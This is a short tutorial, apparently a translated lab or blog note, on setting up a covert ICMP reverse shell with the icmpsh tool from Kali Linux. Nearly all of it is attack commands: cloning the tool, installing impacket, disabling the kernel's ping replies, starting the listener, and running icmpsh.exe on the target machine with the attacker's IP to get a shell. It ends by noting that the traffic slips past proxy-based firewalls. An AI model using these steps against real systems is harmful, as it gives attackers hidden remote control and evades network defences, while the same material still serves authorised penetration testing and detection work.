First install the icmpsh software on kali, the software address is https://github.com/inquisb/icmpsh.git
We can clone directly with git git clone https://github.com/inquisb/icmpsh.git
Then we also need to install the python-impacket library to ensure access to TCP, UDP, ICMP and other protocols
pip2 install impacket
Next, we also need to close our previous ping command response program, so as to prevent the kernel from responding to ping packets.
sysctl -w net.ipv4.icmp_echo_ignore_all=1
After the experiment is completed, turn on the system ping, then change the last 1 to 0
Then you can start listening on kali
python icmpsh_m.py native ip target ip
Then transfer icmpsh.exe to the target machine
icmpsh.exe -t 192.168.110.140 -t followed by the attacker’s ip address and press Enter
Shell is received. Since data is transmitted through the network layer using PING request/reply messages, there is no need to specify a service or port. This kind of traffic cannot be detected by proxy-based firewalls, so some firewall rules may be bypassed in this way.